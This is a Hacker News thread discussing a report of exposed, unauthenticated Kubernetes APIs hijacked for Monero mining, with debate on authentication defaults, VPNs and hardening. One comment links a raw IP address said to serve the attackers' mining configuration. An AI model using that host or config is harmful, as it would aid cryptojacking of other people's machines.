Hacker News new | past | comments | ask | show | jobs | submit login
Kubernetes clusters being hijacked to mine cryptocurrencies (binaryedge.io)
183 points by igama on Dec 6, 2018 | hide | past | favorite | 64 comments



Ugh. I mean, I recently got in an argument if anything but a hard firewall could or should be exposed to a WAN interface on the internet and we kinda agreed to not agree for now.

But, popular services, on default ports, with default APIs enabled, without hard authentication on a WAN interface? That should be a paddling. That doesn't fly. Or, well it does, except not for the guy paying the power.


To be fair, kubernetes itself and most distributions are quite secure by default. So with kubernetes it's not the same as it was NoSQL databases that didn't have authentication that were bound to the internet.

I'm not familiar with enough distributions to know if there is a popular distribution that totally disabled authentication by default, but in my companies distribution, kubeadm clusters, and I suspect all managed clusters (GKE/EKS/AKS/etc), the vector outlined in the article would only work if an admin specifically disabled the authentication.

In gravity (my companies distribution), we even disable anonymous-auth, so someone would have to do real work to allow API access to the internet.


Indeed modern versions of Kubernetes are fairly good for network security against unauthenticated attackers.

That said it's not that long ago that a lot of distros were shipping unauthenticated kubelets, and I think that's where a lot of this will come from.

From cluster reviews I've done, problems like this tend to arise where people are using older versions (so early adopters) or have hand-rolled their clusters, not realising all the areas that require hardening.


How do you provide your initial credentials, though? Providing decently secure default initial credentials is possible, but tricky.

And that's where I'll turn around 180 degrees and say: If you can't give me a hard reason why you'll be a hard target on the internet, you shouldn't have a public address. Default authentication isn't enough.

I dislike trusting my edge firewall, but it gives me time to handle weak internal systems.


Kubernetes only accepts very limited forms of auth by default.

Typically, it's limited to client certificates that have been signed by the private key the apiserver has access to.

Client cert auth over tls is pretty damn secure. I expose my kubernetes cluster's apiserver to the internet and have, to my knowledge, had no issues yet.


Client cert auth is quite good against unauthenticated attacks but has its downsides.

At the moment Kubernetes has no certificate revocation process at all, so if one of your users has their cert stolen for an Internet facing cluster, you'll have to rebuild the entire CA and re-issue all certs to get round the problem.


Yeah, client certs are a good, hard reason. In fact, now that I think of it, the services we expose to the internet all deploy mutual TLS authentication.


I strongly suspect we're going to encounter quite a few instances of admins (or individual developers, depending on how poorly-secured a given corporate network is) installing Kubernetes to test and play with, disabling auth for simplicity of testing, and then completely forgetting they have it installed or failing to properly shut it down and uninstall it.

They may consider that fine for security (the equivalent of having an insecure MySQL install on a machine with no tables of value in it), but might perhaps forget that even an empty Kubernetes install still lets attackers dictate what your CPU is doing.


You will have to patch a critical vulnerability every year on production systems, no matter what language or who develops it.

Secure defaults are irrevalent if you pay attention to the news.


> You will have to patch a critical vulnerability every year on production systems, no matter what language or who develops it.

Interesting. I've got a few openbsd boxes that do not have vulnerabilities that impact them nearly so often.

It turns out that if you practice defence in depth, the majority of security vulnerabilities in the news have no impact on you.

For example, on my openbsd boxes I have only a single user. I do not run any untrusted code. That means spectre/meltdown doesn't actually impact me because no one can run code which will perform such a timing attack.

There was a recent openbsd/Xorg security issue. I didn't have X installed, and even if I did since it's only a single-user server, it again wouldn't have impacted me (privilege escalation means nothing when everyone is effectively root in my threat model).

All vulnerabilities are not created equal, and with enough good practices it's possible to have boxes that are secure for years and years with no need for patches.


Yep. The bloated, overhyped and chruny mainstream crap needs updating all the time (and it kinda tends to break too). Build on that, and hope the updates get done before someone fires and exploit. That's defense in "pray and hope we're faster."

I'm not so concerned about my OpenBSD box with >800 days of uptime, which runs very limited and carefully selected services.


On this point, worth noting that the Kubernetes support lifecycle is currently 9 months, so you indeed need to plan not only for bugfixes but a full upgrade, fairly regularly


To be fair, you're playing with fire if you rely on product security to be perfect. For every SSHd out there there are multiple SystemD or worse security products.


I think you meant "OpenSSH" not SSHd, and "systemd" is always spelled lowercase. The 'd' doesn't stand for something and is never capitalized.

"sshd" is an ambiguous term as there are many ssh daemons, from the libssh server to dropbear to OpenSSH, and OpenSSH is likely the one that you use and the most secure one.

systemd has had a few security incidents, but very few of them are actually a big deal. People have overblown each and every one since there has become a cult of systemd hate, which has muddied the waters significantly.

> you're playing with fire if you rely on product security to be perfect

That's a vacuous statement; of course you can't rely on everything being perfect, so you must practice defence in depth. Everyone already knows software sometimes has bugs.

The point of the parent post is that Kubernetes does intend to allow secure use while being exposed publicly (unlike e.g. the default redis configuration). The parent post does not claim it is perfect and that you must never patch it, merely that it is reasonable and can be hardened.

In the end, there are tradeoffs. You must decide that the convenience of developers being able to ssh into machines is worth the risk of running OpenSSH. You must decide that using Google Apps is worth the risk that Google will have a data breach exposing all of your confidential information. You must decide that Slack can be trusted to write secure enough php that your messages aren't being read by others.

Just because something isn't perfect doesn't mean that it can't still be a good tradeoff based on the expected risk.


> "systemd" is always spelled lowercase. The 'd' doesn't stand for something and is never capitalized.

I thought the 'd' was a holdover from "daemon", as in initd or setsid, as a general name for a background process. systemd is a little more than just a background process but it's sort of the same idea.

From the wiki page: "In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned the init process (process number 1) as its parent process and has no controlling terminal. However, more generally a daemon may be any background process, whether a child of the init process or not. "

https://en.wikipedia.org/wiki/Daemon_(computing)


From their documentation [0]:

> Yes, it is written systemd, not system D or System D, or even SystemD .... [You may also, optionally] call it (but never spell it!) System Five Hundred since D is the roman numeral for 500 (this also clarifies the relation to System V, right?).

The 'd' is a pun on both daemons typically being postfixed with 'd' and on the roman numeral for '500'. It does not directly stand for either though officially.

[0]: https://www.freedesktop.org/wiki/Software/systemd/


While naming trivia is interesting, it is a fact that systemd has had its fair share of security problems. And while it is a fact that OpenSSH is more mature, systemd has some issues with recognizing security failures as such https://www.reddit.com/r/linux/comments/6mykng/that_systemd_...


That is a perfect example of security FUD around systemd.

The attack vector is what? Someone manages to convince an administrator to write a service that has "User=0foo" in it?

If an attacker has access to write into `/etc/systemd/system` then they already have root on the system.

If an attacker can cause an administrator to write a systemd unit and the administrator isn't checking that it's reasonable, the attacker could just have the `ExecStart` line run a 'sploit and not have a `User` line at all.

Seriously, what is the attack that you imagine where this has a security impact?

As Poettering said on that issue, no one should be running system services as usernames starting with numbers, and that's questionably valid in the first place.

People still have blown it out of proportion because it's systemd.

Note that a similar issue exists in the old sys-v init scripts: they run as root, and if you convince a person writing a sys-v init script to exclude the `start-stop-daemon -u username` flag, then the daemon will run as root. Basically identical, but never assigned a CVE because no one seriously considers "I talked my sysadmin into running something as root" by itself a privilege escalation.


Yes, I meant OpenSSH


Got in a pretty heated debate with a colleague once about this. We had a really great infrastructure setup with a VPN bastion host that would get you into our VPC. You couldn't reach any of our kube nodes externally. Your Google account was your VPN account. It was pretty solid.

When this engineer redid things they opted to go the public internet route where the master runs a public api and auth is done via a certificate. The logic here was so that external 3rd party stuff (CI) could control our master.

To my knowledge this setup is still running and chances are these machines are vulnerable to this issue.

Contrast to the prior setup where, immediately upon being offboarded from the company your VPN access became automatically terminated (thank you LDAP and Foxpass!)


I can't imagine a good reason to expose ANY of my services to the public internet. Aside from a rest-api that drives our application, where that is the feature of course.

With software like google IAP, and many similar products, it just seems silly.


May I recommend reading up on beyondcorp [0]?

Google has moved its internal stuff to the beyondcorp model, and it honestly seems like a better approach if you really care about security and have a big enough security team to make it work.

[0]: https://www.beyondcorp.com/


Beyondcorp is a great model IF you can afford to manage it correctly.

Google have a) huge resources and b) a threat model which means they're subject to a lot of high-end attacks all the time.

for many corp's the idea of exposing all their services and endpoints to the general internet without firewalls or VPNs would ... end poorly...


Thank you for the suggestion! :)

Google I(dentity)A(ware)P(roxy) is actually a hosted beyondcorp implementation! But I probably should have explained that in my original comment.


No, a Kube cluster with client certificate authentication enabled is not going to be vulnerable to the specific issue discussed in OP's blog post: those are Kube cluster exposed publicly with no authentication whatsoever.

I generally think it's no more risky to expose a Go app with cert-based auth than it is to expose OpenVPN so long as both are set up correctly.


Actually the CVE mentioned at the top of the blog could be exploited over the API server port in quite a few default configurations (thus the CVSS 9.8 score)

Many Kubernetes distributions enable anonymous authentication to allow for health checking, so there is some risk there.

As to the general point, the only thing I'd say is that Kubernetes is a massive 1.5 million Line code base which is relatively new code, where Openvpn has been around and attacked for a long time. I wouldn't be surprised if the recent CVE isn't the only issue we see in k8s over the next year.


Why is a web server's demand for a certificate different from a VPN server's demand for a certificate?


Complexity and publicity.

Complexity: Single purpose apps built with a very specific threat model in mind for a boring, established usecase tend to be more secure. K8s is a fast evolving labyrinth of complexity with contributions from thousands of people, very few of whom have a grasp on the whole codebase.

Publicity: the general Internet doesn't find your VPN server just by using your API.


The VPN server offers frivolous features like session tracking, and certificate revocation. Things k8s continues to punt down the road or outright ignore.


Because VPNs are magic that never has a backdoor for a decade.


> The logic here was so that external 3rd party stuff (CI) could control our master

Why not sidestep the issue by running CI within the VPC? :/


Ugh going from bastion host hopping to publicly addressable would be a nightmare. Please tell me the database doesn't have a publicly addressable ip & host.


Bah I hope they at the very least have firewall whitelist rules to limit API access to your CI vendor ranges.


A the risk of stating the obvious: using a VPN would not really protect you this vulnerability, though it would mitigate your exposure (a lot or a little depending on your setup and threat model).

edit: to clarify, vpn/vpc requirement would turn CVE-2018-1002105 from a pre-auth to a post-auth vulnerability, right? Which might be a big or small help depending on how controlled your user pool and signup process is.


At least cryptocurrency has removed most of the creativity from script kiddies - there's so many more interesting things you could do than just mine coins.


Yeah, exactly. It’s almost like a bounty for find a vuln. It seems to be a mostly harmless attack that doesn’t cause global internet grief like a DDoS or something.


WannaCry’s very public global ransom brought attention to a Monero mining botnet which was using the same exploit for weeks beforehand, it was making $40,000 per day. It made much more than WannaCry and its operators are still unknown and would have been able to cash out

Script kiddies are just annoying and their actions resulted in the patch killing that silent mining botnet as well.


This is one of the side-effects of products having enormous hype in this industry.

Far too many people are adopting Docker/Kubernetes as they have been the hot new product for the last couple of years, often regardless of whether they are actually the best or most appropriate tool for the job.

A lot of the people who get sucked into the hype are often inexperienced programmers, devops or admin types who are in positions of power or influence in companies that they probably shouldn't be, IMHO.

As a result, they don't have the Linux or networking experience to be able to know when they are deploying these complex products securely or not, and they are putting their employers businesses at risk.


I disagree that hype leads to the problem you describe. Kubernetes is good at its job, and therefore it's popular, and therefore it's used by people who may not understand it.

You could say the exact same thing about Linux, Cisco, Dell, or pretty much any of the popular FOSS projects. Popular things, regardless of their complexity, get chosen by people of all experience levels. Inexperienced people are less likely to properly configure something, regardless of its popularity or hype.

If anything, having a few attractive projects tends to be beneficial (or at least neutral) for security as there are so many more people scrutinizing it, and many more people learning how to properly use it.


>A lot of the people who get sucked into the hype are often inexperienced programmers, devops or admin types who are in positions of power or influence in companies that they probably shouldn't be, IMHO.

I cannot agree more. Many times, I feel you da easily do away with ansible and terraform to setup VMs / docker. you dont quite need k8s. Just cuz K8s are cool.. people feel the need to use it.


It's more complicated that that. Whilst some people are probably jumping on kubernetes for the hype, there's a lot of things it makes really easy, especially for less experience teams.

For example:

- You want to spin up ephemeral environments to test PRs end2end. Sure, create a namespace, deploy your charts and run your tests. You want to do that with ansible, sure you can, but it's harder.

- You org is running apps via a multi-cloud and on-prem strategy? Okay, lets just write lots of tooling per cloud and another for on-prem, or we could abstract that away via kubernetes and only worry about tooling for kube itself.

- You want to do have rolling-upgrades. Sure, you build them with ansible then, or you could just use kubes.

Further to that, kubernetes is guiding reasonble abstractions, seperating infrastructure from code. Sure, it comes with complexity, but so does most things when you start throwing in scaling and auto-recovery.

For example, deploy terraform from your laptop? The device you probably browse porn on has becomes an attack surface. Move this to Jenkins, the CI is the attack surface. Put your code on Bitbucket? Bitbucket and the Jenkinsfile becomes the attack surface. Pretty much everything we do has complexity and attack surface _problems_ and using a managed k8s service will allow you some easy wins so you can actually think about those other problems, and those solutions will work on all platforms you can run k8s on.


Can I ask because I'm genuinely interested - what on earth do you do for third-party applications (for eg. closed source) that have to be integrated into your environment that don't come pre-packaged in a convenient container?

Do you containerize these yourselves, whether or not the vendor says that will support that? Or does it get pushed to some other team that manages whole VM's/AWS instances that are not container hosts.

Or is this a scenario that just doesn't happen in your environment?

Genuinely curious.

Also:

> using a managed k8s service will allow you some easy wins so you can actually think about those other problems, and those solutions will work on all platforms you can run k8s on

None of which matters one jot, if one cannot properly manage ingress/egress filtering on one's API endpoints, or a reasonable level of password/credential security. One will be used for cryptomining or worse, as per the fine article.

In that instance, one needs to go back and get some basic UNIX/Linux/network and security training before one starts playing with complicated software on publicly connected clouds. Or hire some people who actually know what they are doing with respect to that.


> Can I ask because I'm genuinely interested - what on earth do you do for third-party applications (for eg. closed source) that have to be integrated into your environment that don't come pre-packaged in a convenient container?

Depends what it is. I've taken a number of apps and wrapped them into docker containers and then written a helm chart. Some orgs get a bit skittish over "vendor support" but this usually only matters when they think it's a key product.

The point is, once you have a fleet, you should manage everything the same. If you're off building other pet services, you're going to have capacity problems.

> None of which matters one jot, if one cannot properly manage ingress/egress filtering on one's API endpoints, or a reasonable level of password/credential security. One will be used for cryptomining or worse, as per the fine article.

I mean sure, but I did say use a managed service, which will come with auth. Similarly I wouldn't recommend you host services on any cloud or network facing the public, without a professional involved.

For example AWS is easy to get wrong all the same. One of my current client is busy hiring developers with no experience to put services on AWS, and they came up with no encryption, no auth, no monitoring, misconfigured IAM. What's really the difference between that and kube?


> Do you containerize these yourselves, whether or not the vendor says that will support that? Or does it get pushed to some other team that manages whole VM's/AWS instances that are not container hosts.

Working with large enterprises, I've seen both. If there's a good business case for the risk vs rewards (i.e. containers providing something technically useful which can be translated directly into revenue) and a good engineering + management team, some companies will actually risk it.

There's also the factor of how good the company's relationship with the third-party vendor is. Some companies have the weight to make the vendor support the unsupportable.


I dunno, any cluster with more than 5 servers is a pain to deal with without something like kubernetes.


Note K8s is designed to control a lot of machines, sometime the entire fleet of smbs.

So itself should be more sensitive than other infrastructure pieces.

And I think op meant to say that, not that k8s is particularly bad in security in general. Or k8s is less experienced in security.

The down vote is not warranted.


The "hype" part is pretty subjective and may have warranted down votes.

It's not hype if it solves a lot of organizations pain points.


Let's be honest, pretty much every new tech got hyped initially.

K8s is no doubt hype, otherwise it won't enjoy the explosive growth.

That's not subjective, at least IMHO


It's the delineation of 'hype' and 'excitment' that is tricky.

If magic CPUs that were 10x better showed up tomorrow we'd all be justified in being very excited. But running with hype around the next Zune? ... that's not excitement backed with meaning.


Then we should agree to disagree.


Why do you assume that other platforms are not at similar risk?

VMs also have zero-days that have been exploited for cryptomining.


I don't assume that at all. I mentioned Docker explicitly and people are pulling Docker containers from untrusted sources with malware pre-installed, because they lack the experience that would tell them that pulling untrusted Docker containers and running them is a bad idea.

https://threatpost.com/malicious-docker-containers-earn-cryp...

From the article itself, although they mention the CVE at the top, the real point they are making is that people are deploying the products with poor defaults:

"as is typical with our findings, lots of companies are exposing their Kubernetes API with no authentication; inside the Kubernetes cluster"

Not to mention a bunch of NoSQL type db's you can easily search on Shodan if you wanted to have some fun.

So yes - the problem here is experience, or lack thereof, and not Kubernetes itself. The CVE can be patched. You can't patch inexperience - except with experience I suppose.

All I am saying is that there a lot of people who are downloading and deploying these products because of hype, who are unable or unwilling to secure them.


Leaving aside NoSQL db's - there's also a ton of normal SQL databases wide open, I don't think hype is necessarily the issue there.


Sure, maybe your average garden variety Postgres or MySQL instances, and probably some MS-SQL as well. Companies that have a large investment in commercial RDBMS (eg. Oracle, DB2, etc) tend not to be so careless in my experience.


CEO of BinaryEdge here, ur 100% right. If I show you the queue of posts we have you'd see similar posts to this one just with different technologies that we have seen being infected or misused(etcd, docker, and about 10 or 20 more types of DB's).


CTO Binaryedge here. For those wondering, We have detected more than 15k Kubernetes APIs with Auth. This post focuses on ~1.5k found without Auth, that are fully open.

It's not just a Kubernetes Problem. Like many have posted, many databases, other types of clusters, shares, are accessible without Auth for those that know how to look for them (not that hard now days), mainly malicious actors.


JSON file is still available (http://192.99.142.232:8220/222.json)


> "algo": "cryptonight",

Nice, Monero mining

Cryptocurrencies makes the bug bounty market A LOT more efficient than companies, legislation or HackerOne ever could.


Heading continued: “... thieves make off with $4.50”


Is anyone else a little tired of "X used to mine crypto" stories?

Yes - if it has a CPU and access to the public internet, someone will hack it and make it mine "cypto". Let's stop pretending we aren't aware that the internet of things exists and writing breathless stories every time a toaster, router, or adult toy starts churning out Monero.


This is an important vulnerability in widely-used software. Crypto is relevant because the inherent design of crypto makes hacks like this more profitable, but it's not the main thing about the article.


Exactly, the main story is Kubernetes being exploited in the wild and in large numbers, Crypto mining is just one of the "attacks" tacking place.


Is kubernetes a mongodb of orchestrators?


These guys are amazing. They have a lot of data and an excellent app with a lot of potential!




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: